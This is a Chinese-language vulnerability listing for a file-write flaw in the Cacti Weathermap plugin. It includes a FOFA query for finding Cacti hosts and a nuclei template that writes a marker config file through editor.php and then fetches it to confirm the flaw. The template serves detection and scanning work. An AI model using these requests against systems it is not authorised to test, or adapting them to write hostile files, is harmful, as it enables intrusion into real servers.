cacti-weathermap-file-write: Cacti Weathermap File Write

日期: 2025-08-01 | 影响软件: Cacti Weathermap | POC: 已公开

漏洞描述

Cacti Weathermap 存在文件写入漏洞，攻击者可利用漏洞写入任意文件。 fofa: title="Cacti"

PoC代码[已公开]

id: cacti-weathermap-file-write

info:
  name: Cacti Weathermap File Write
  author: pikpikcu
  severity: medium
  description: Cacti Weathermap (a plugin for Cacti, an open-source network monitoring and graphing tool) is vulnerable to file write.
  metadata:
    max-request: 2
  tags: injection,cacti,vuln

http:
  - method: GET
    path:
      - "{{BaseURL}}/plugins/weathermap/editor.php?plug=0&mapname=poc.conf&action=set_map_properties&param=&param2=&debug=existing&node_name=&node_x=&node_y=&node_new_name=&node_label=&node_infourl=&node_hover=&node_iconfilename=--NONE--&link_name=&link_bandwidth_in=&link_bandwidth_out=&link_target=&link_width=&link_infourl=&link_hover=&map_title=46ea1712d4b13b55b3f680cc5b8b54e8&map_legend=Traffic+Load&map_stamp=Created:+%b+%d+%Y+%H:%M:%S&map_linkdefaultwidth=7"

  - method: GET
    path:
      - "{{BaseURL}}/plugins/weathermap/configs/poc.conf"

    matchers-condition: and
    matchers:
      - type: word
        words:
          - "TITLE 46ea1712d4b13b55b3f680cc5b8b54e8"
        part: body

      - type: status
        status:
          - 200
# digest: 4b0a00483046022100a0156cbc47f78e3482366a109bc3b3c96ab454fa21a5e51edcef11b6b5846b340221009be5e4e679cbd5d01d954f2aee9e86dc6b4a73fc2821cee7e15750dc79a4acca:922c64590222798bb761d5b6d8e72950

来源: https://github.com/projectdiscovery/nuclei-templates/blob/main/http/vulnerabilities/other/cacti-weathermap-file-write.yaml

漏洞描述

PoC代码[已公开]

相关漏洞推荐